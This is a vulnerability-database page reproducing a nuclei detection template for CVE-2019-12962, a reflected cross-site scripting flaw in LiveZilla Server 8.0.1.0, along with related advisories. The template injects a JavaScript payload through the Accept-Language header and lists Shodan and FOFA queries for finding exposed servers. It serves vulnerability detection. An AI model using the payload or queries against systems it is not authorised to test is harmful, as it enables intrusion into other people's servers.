Lucene search
K

LiveZilla Server 8.0.1.0 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 51 Views

LiveZilla Server 8.0.1.0, Cross-Site Scripting, CVE-2019-12962, reflected XSS vulnerability, upgrade require

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
LiveZilla Server 8.0.1.0 - (Accept-Language) Reflected XSS Vulnerability
19 Mar 202100:00
zdt
Circl
CVE-2019-12962
15 Jan 202409:19
circl
CNVD
LiveZilla Server Cross-Site Scripting Vulnerability (CNVD-2019-21246)
26 Jun 201900:00
cnvd
CVE
CVE-2019-12962
25 Jun 201912:55
cve
Cvelist
CVE-2019-12962
25 Jun 201912:55
cvelist
Exploit DB
LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
19 Mar 202100:00
exploitdb
EUVD
EUVD-2019-4537
7 Oct 202500:30
euvd
NVD
CVE-2019-12962
25 Jun 201913:15
nvd
OpenVAS
LiveZilla < 8.0.1.2 Multiple XSS Vulnerabilities
2 Jul 201900:00
openvas
OSV
CVE-2019-12962
25 Jun 201913:15
osv
Rows per page
id: CVE-2019-12962

info:
  name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
  author: Clment Cruchet
  severity: medium
  description: |
    LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
  impact: |
    Attackers can inject malicious JavaScript through the Accept-Language header, potentially stealing session cookies, credentials, or performing unauthorized actions on behalf of victims.
  remediation: |
    Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49669
    - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
    - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12962
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12962
    cwe-id: CWE-79
    epss-score: 0.09052
    epss-percentile: 0.94643
    cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: livezilla
    product: livezilla
    shodan-query:
      - http.html:LiveZilla
      - http.html:livezilla
    fofa-query: body=livezilla
  tags: cve,cve2019,xss,edb,packetstorm,livezilla,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mobile/index.php'

    headers:
      Accept-Language: ';alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var detectedLanguage = ';alert(document.domain)//';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c34fe5a8834951caa6e763a18aca1e9c4392d305c5fd1f80af2aba461980321022100af0582b3fbc4cf17e03b9278ec0851c6b0452b57a7ae5045486248b98b3ece4d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.09052
51